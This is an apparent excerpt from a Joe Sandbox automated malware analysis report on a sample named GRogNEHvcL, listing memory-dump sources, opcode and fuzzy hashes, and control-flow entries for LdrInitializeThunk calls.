                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c9303c62b4213851c6769eb01eb3dcea537b8eae643e7a33927c3365f132ad2
                                            • Instruction ID: 829ce6d9bd1fbf5fe12f16a94d1eb15e22290a1a5d125463a892186d69ef74d6
                                            • Opcode Fuzzy Hash: 5c9303c62b4213851c6769eb01eb3dcea537b8eae643e7a33927c3365f132ad2
                                            • Instruction Fuzzy Hash: 0641F474D08209CFCF54CFA8C5849EEBBF9FB49302F20916AD849A7351D7789A41CB61
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3660089a77cd561e170fb18510125526d9d54df6e6e4f75bdea6e6cb01d7cd29
                                            • Instruction ID: 018022b65af6dc70e5e371fba95016f0bef06fdcef6c8f4fe876257b916e4838
                                            • Opcode Fuzzy Hash: 3660089a77cd561e170fb18510125526d9d54df6e6e4f75bdea6e6cb01d7cd29
                                            • Instruction Fuzzy Hash: CC318E347056408FCB0A9B38D89499E7FB5EF8A61471940DBE501CF3B2DA65EC4ACB91
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29550cc556f387a1f9cfd0c1c0ce1934fc87fd87e76679207dec3b517e0aad87
                                            • Instruction ID: d2adbf9565249bbe236549b026434e4e043aa9e737c1da254f3f270a7cc36366
                                            • Opcode Fuzzy Hash: 29550cc556f387a1f9cfd0c1c0ce1934fc87fd87e76679207dec3b517e0aad87
                                            • Instruction Fuzzy Hash: 2C31D0719042188FCB20CE5CC8457AEBFB0EF4230AF14407BE095DB292C374C942CB51
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0b111ff61d01d6d9f1ba9c5845415c2208288e34d40487f79db5f55410e84ed
                                            • Instruction ID: db815d64993f5aadfe24ccfc393a1bbd5851bf03d3f47a567808ffe36c85788e
                                            • Opcode Fuzzy Hash: f0b111ff61d01d6d9f1ba9c5845415c2208288e34d40487f79db5f55410e84ed
                                            • Instruction Fuzzy Hash: 5331CF71A042188BCB20CE5DC8457AFBFB0EB4630AF14407FE4A5DB292C3B5D942CB51
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10652986ab7ae6591f6af00ae35410c5b10452fab2d4259d49d5f9382bb3eb28
                                            • Instruction ID: a121228eb00c8bda1fe3886e40d46480c6beddb7617a142de4c2ca09a23fff29
                                            • Opcode Fuzzy Hash: 10652986ab7ae6591f6af00ae35410c5b10452fab2d4259d49d5f9382bb3eb28
                                            • Instruction Fuzzy Hash: FE313A74D09208EFCF10CF98C5409AEBBF9FF49312F109696E459A7356D3749A42CBA1
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91d529e61bd4f7f659731b8cbcf17cd3f6e273cb3212b2cbacc731071ffe844b
                                            • Instruction ID: ae5077aec2e4db21de99abe1f7e3d073e9400415abd9818d750cba8e3f422952
                                            • Opcode Fuzzy Hash: 91d529e61bd4f7f659731b8cbcf17cd3f6e273cb3212b2cbacc731071ffe844b
                                            • Instruction Fuzzy Hash: 663195B5E00615CFDF28EB74C1543AEBAB2EF88315F14483AD441A7390DB358986CBA6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d914d67640b8888f80c706b4abc93bb9f2766b38c5ffac62dd58d0e41cead8e0
                                            • Instruction ID: aa6078677ea8a8683758122e8070a3aae3d412ad9c518cae9ec9890d4e290fb8
                                            • Opcode Fuzzy Hash: d914d67640b8888f80c706b4abc93bb9f2766b38c5ffac62dd58d0e41cead8e0
                                            • Instruction Fuzzy Hash: 9F21EB30A086648BCF358FA9CA2137BBFB2AF91213F16856BE4F1C62D2D234C442C751
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eba981a276b0e3ffc48212a0ddb7ef27376105419794961a6b133b9ee58f38c7
                                            • Instruction ID: cc7f0718e540b1b8c4002eb12ea74f271852981c474e84f3d99028fe3238aa29
                                            • Opcode Fuzzy Hash: eba981a276b0e3ffc48212a0ddb7ef27376105419794961a6b133b9ee58f38c7
                                            • Instruction Fuzzy Hash: D331C735D086A4CBDF314B69E45477ABFE5EF42222F048A7BE1E68B292C27CD601C711
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2205692174.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_d2d000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59c1e0857c886aa32a6a865116c72df17cc43f35647a38130ee5a8698bfbfa2b
                                            • Instruction ID: f45ce4ee7721c96981cbdb4b88da0f7f67117ae977d525b212c8dd50678b1efe
                                            • Opcode Fuzzy Hash: 59c1e0857c886aa32a6a865116c72df17cc43f35647a38130ee5a8698bfbfa2b
                                            • Instruction Fuzzy Hash: 2E210671504204DFDB05EF14E9C0B16BF66FBA8318F24C569D9090B256C33AE856D6B2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2205692174.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_d2d000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eed26b1a4e2a52865bb9d6068cad450825683bb91da864f04e0baf96cd9e2c91
                                            • Instruction ID: 29a31156c94a7fcdbd992843783d22bd8a86963520502848737ae42e47772157
                                            • Opcode Fuzzy Hash: eed26b1a4e2a52865bb9d6068cad450825683bb91da864f04e0baf96cd9e2c91
                                            • Instruction Fuzzy Hash: FA212F71504240DFCB05DF14E980B26BFA6FBA8318F24C5A9E8490A256C37AD846CAB2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77afcf75222df1327a969f9ad0c22a2b20419c8c5679dc8c028ec149e11bae58
                                            • Instruction ID: 031312d81011ffbf918724e96666ee56644b3fad22de8f3defc2caac2e7eeee0
                                            • Opcode Fuzzy Hash: 77afcf75222df1327a969f9ad0c22a2b20419c8c5679dc8c028ec149e11bae58
                                            • Instruction Fuzzy Hash: CF216070D442A4CFCF20CF6D894067FBFB0EB45312F40856BE5AA9B686D23499868B91
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c4f80a2f69f14d4db15ad83837e8a5d889ade410b95db98d8f3bc77ef58c6a6
                                            • Instruction ID: 61a6aa6086d2963e61ee174563d3c51bb15c9899f89eafd725a6089098d3764d
                                            • Opcode Fuzzy Hash: 5c4f80a2f69f14d4db15ad83837e8a5d889ade410b95db98d8f3bc77ef58c6a6
                                            • Instruction Fuzzy Hash: 49218135805219EFCF21CF98D8408EEBFB5FF4A311F108597E449A7251C735AA59CBA0
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2254077802.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_110d000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 53aef20a3fadd3d75e57faa298606ca3aa9d9402762e476b67eaefe4d3d8f8d5
                                            • Instruction ID: 91b30d3e4f836fbb5ebb1e3aa5d64841f3081b03fee7280de6ce26b639c7e82a
                                            • Opcode Fuzzy Hash: 53aef20a3fadd3d75e57faa298606ca3aa9d9402762e476b67eaefe4d3d8f8d5
                                            • Instruction Fuzzy Hash: C521F871904204DFDF0ADFD8E5C0B25BB65FB84324F20C56DE9094B296C37AD406CA62
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2254077802.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_110d000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 966654bc0444cbd39322085ec1b36cb2a27ff74a1c474a0010c3846be1697010
                                            • Instruction ID: f0a5e3336a017d49caed92822ed95ba47f05c5b5586421e4420982c1971fdf69
                                            • Opcode Fuzzy Hash: 966654bc0444cbd39322085ec1b36cb2a27ff74a1c474a0010c3846be1697010
                                            • Instruction Fuzzy Hash: CB212871904204DFDF1ADF98E580B16BF65FB84314F20C56DD90D4B29AC37AD407CA62
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a3fc51ddca4baed626406889ef61105c8ed62619acc86b444543ab77fa4394f
                                            • Instruction ID: ea6e7515027cfb94afe1fa3c9dfd97c6ad46c7e72e10a242c944dbc2ff8e91c0
                                            • Opcode Fuzzy Hash: 0a3fc51ddca4baed626406889ef61105c8ed62619acc86b444543ab77fa4394f
                                            • Instruction Fuzzy Hash: B621CF35A10209EFCF05EFA4D9849DEBBB6FF89304F054525E401BB260DB71A846CB91
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75d386f82460c2f4aff144805e7d805f197a7362e9a2a465f78f0e6110a1c1a4
                                            • Instruction ID: 4074e9af0eb416419f66f2853814b6b43ca3ff2ecaf3766b003e742a04190c4f
                                            • Opcode Fuzzy Hash: 75d386f82460c2f4aff144805e7d805f197a7362e9a2a465f78f0e6110a1c1a4
                                            • Instruction Fuzzy Hash: 6B21C671A09265CBCF218F65B9902BABFB5EF41322F0440ABD5F5EB181F7308906C751
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8834ee3aabe7640326aaac7c83abe521b9d3556505d75abf4e8ed0755467e15
                                            • Instruction ID: 65d582dead1d919edeb03518f9eb637d370ca3da499a5835f61cfc5d5a233116
                                            • Opcode Fuzzy Hash: d8834ee3aabe7640326aaac7c83abe521b9d3556505d75abf4e8ed0755467e15
                                            • Instruction Fuzzy Hash: 76110875A003158B4B20EB7D8C449BFBEF6EFC5261754492ED459D3341EB3099068365
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73df187e65e16322f5755cf7c63f1d7a7c498ae4681fa9b044204facf433fa70
                                            • Instruction ID: b3e4953b1c6de02871faa8f665fa0f4664aa61bf29d5433da9cdb1071bb56fd5
                                            • Opcode Fuzzy Hash: 73df187e65e16322f5755cf7c63f1d7a7c498ae4681fa9b044204facf433fa70
                                            • Instruction Fuzzy Hash: C7110677A443054B4F20DA6D9C408FFBBBAFAC6171760871EE5B6973D1DA3095068750
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa9693ba8f7d30f1d9ab8baf5fb6a037627dee79c6285de0a95f42892d49f3fd
                                            • Instruction ID: 65e0c368fd1227af52637a0852b92c2c7adb0e8f6293f15a9e9333851d9c6e5b
                                            • Opcode Fuzzy Hash: aa9693ba8f7d30f1d9ab8baf5fb6a037627dee79c6285de0a95f42892d49f3fd
                                            • Instruction Fuzzy Hash: 84116331A04125CBCF24CE5AB5806BBBFA5EB84322F0044ABD5F6AB285F7319905C661
                                            Memory Dump Source
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fda32723a4feeb52ac78ce0918f7291e37c04e2cb6e25d258773aea8de93b99c
                                            • Instruction ID: ffa0f943fd9c9c0c31eaa23f5e982372358857ca68d26d007491a63dd3424a46
                                            • Opcode Fuzzy Hash: fda32723a4feeb52ac78ce0918f7291e37c04e2cb6e25d258773aea8de93b99c
                                            • Instruction Fuzzy Hash: 2FC08030B4453DDF0D310944E6545753E48854759370000DBD4D9C7B80CF124403CBAD
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14d37e51e9556d90bb47b76502e1bb50bafab467e6cdb5e5d76229399d4b16e7
                                            • Instruction ID: 4e258598a21013bab3834c4fbdd5d7e55084b8ccd36127c0f190cb7d68f4c5d4
                                            • Opcode Fuzzy Hash: 14d37e51e9556d90bb47b76502e1bb50bafab467e6cdb5e5d76229399d4b16e7
                                            • Instruction Fuzzy Hash: F5D0122A51E3C11FE7032760CD21A81BFB0AE6718832981CBD0C08A173C50A982DDBA6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 919230550d06feb9a38c9ad39d5bb333cf54d685abb22d31d11deb86b9797aac
                                            • Instruction ID: 1e1969f7e882dbafb18bf8beeca929472c879561d02b1429bff3a6f5e0f5ec53
                                            • Opcode Fuzzy Hash: 919230550d06feb9a38c9ad39d5bb333cf54d685abb22d31d11deb86b9797aac
                                            • Instruction Fuzzy Hash: 54D05E78809354CFDF21A714E9156023BE4AB1172AF188295940147955D774C45DCF4A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fdd8b67ab8c6556362cc23be2c3d1bdff005fc3cac4e0d442504261ac03a49a6
                                            • Instruction ID: 31e6fa5114dc7b0842254171ab0e9900f1ed678fd74f4417996382fba42b6611
                                            • Opcode Fuzzy Hash: fdd8b67ab8c6556362cc23be2c3d1bdff005fc3cac4e0d442504261ac03a49a6
                                            • Instruction Fuzzy Hash: A0C04C5341D7D11FD70302B45D261953F745E63145B4E05C7E488CB9A3E1894958D32A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2215d15a429e5033974e967af5cd3c8f292f264d52edbc931e38e01d8b61db16
                                            • Instruction ID: ecb9130e6ed03ddaa75d79859afa88d0db568fb6847bfda3e173a62e06c8ebfd
                                            • Opcode Fuzzy Hash: 2215d15a429e5033974e967af5cd3c8f292f264d52edbc931e38e01d8b61db16
                                            • Instruction Fuzzy Hash: C9C08C300813048FCB146B9CF40E3663AE8EB01323F820210F40800022CBAC80A0C671
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dead3dffa0e866f0fc44c8ab6a660dc17eb83fe7442a7412e797aa29b36230a6
                                            • Instruction ID: 148c1b6f2ba39254bf7ebc8dd19bdf247f6c5d2e427a7efb3d5f534e5f178f4d
                                            • Opcode Fuzzy Hash: dead3dffa0e866f0fc44c8ab6a660dc17eb83fe7442a7412e797aa29b36230a6
                                            • Instruction Fuzzy Hash: 05C08C7080E2828FCB208B2084084F83FAE2F5172131A80FBC1AD82893EE98082A8301
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbc24959a26b6bbd6d25254f04049fc2cfb35adfddfe68487ddc1ceb96c9f447
                                            • Instruction ID: f2e54224133e52c824b67e648e65440b09ceec663ce1d9b7dc3dd2d4a9dac52c
                                            • Opcode Fuzzy Hash: dbc24959a26b6bbd6d25254f04049fc2cfb35adfddfe68487ddc1ceb96c9f447
                                            • Instruction Fuzzy Hash: CEC012718083859FCB42C724D428228BBA0EB62324F848BE994498909AE72C0918CB82
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7715c7ec06365b422c06089b266585cec85ea084e1755b17d5da19ff094a715b
                                            • Instruction ID: e8b6ad3635374e304a3cfa9e4a0bd6c0577b4eb96be45e79c8c6a0470ce6e0c7
                                            • Opcode Fuzzy Hash: 7715c7ec06365b422c06089b266585cec85ea084e1755b17d5da19ff094a715b
                                            • Instruction Fuzzy Hash: DAB012762F5140E38608726C89C8D3BE992EFB2701B40AC12738550061C46084ADE23F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7beea0d9ae105292ac579d52bcd9f7db926aacc01a4257dc72a8c89193601fc0
                                            • Instruction ID: b1c9332a197ab3675615e7b382ca7b4dc55ddbdac9c9a55448e02b6cbeb38417
                                            • Opcode Fuzzy Hash: 7beea0d9ae105292ac579d52bcd9f7db926aacc01a4257dc72a8c89193601fc0
                                            • Instruction Fuzzy Hash: 78C01234844218CFCB64DF18DA45BA8BBBABF04300F0082EA980A93228CB342E40CF11
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51fe62968c151370e45d3dca76ac6b9aa1ab5aaf0102702678aecf5515d81322
                                            • Instruction ID: 1e9e64d68e43fc980d3b052e6c7899e3f226c0b6bd56e14e73f4fecd85f9bd30
                                            • Opcode Fuzzy Hash: 51fe62968c151370e45d3dca76ac6b9aa1ab5aaf0102702678aecf5515d81322
                                            • Instruction Fuzzy Hash: 7690023105470C8B46402795780E55A7F5DB954655B854461BD0D455419E5668104599
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2d690e6ab9e4ee219bd41877f4bf6116a0d7e3af64ca4fed25db93f7bb24ff4
                                            • Instruction ID: cec72713cf875d5aebc8486f8fdc449746f8cf83e6857cd373a1be6fb7515669
                                            • Opcode Fuzzy Hash: b2d690e6ab9e4ee219bd41877f4bf6116a0d7e3af64ca4fed25db93f7bb24ff4
                                            • Instruction Fuzzy Hash: 6CA00174809215AADB204A559009368BEA0AB2432AF028156945662641DB7C01859E01
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8aq$8aq$$]q$$]q
                                            • API String ID: 0-2167536008

                                            Execution Graph

                                            Execution Coverage:0%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:1
                                            Total number of Limit Nodes:0
                                            execution_graph 61866 1a72c1d LdrInitializeThunk

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 1a72c0a-1a72c0f 1 1a72c11-1a72c18 0->1 2 1a72c1f-1a72c26 LdrInitializeThunk 0->2
                                            APIs
                                            • LdrInitializeThunk.NTDLL(01A8FD4F,000000FF,00000024,01B26634,00000004,00000000,?,-00000018,7D810F61,?,?,01A48B12,?,?,?,?), ref: 01A72C24
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 5 1a72df0-1a72dfc LdrInitializeThunk
                                            APIs
                                            • LdrInitializeThunk.NTDLL(01AAE73E,0000005A,01B0D040,00000020,00000000,01B0D040,00000080,01A94A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,01A7AE00), ref: 01A72DFA
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4 1a72c1d-1a72c26 LdrInitializeThunk
                                            APIs
                                            • LdrInitializeThunk.NTDLL(01A8FD4F,000000FF,00000024,01B26634,00000004,00000000,?,-00000018,7D810F61,?,?,01A48B12,?,?,?,?), ref: 01A72C24
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 6 1a735c0-1a735cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
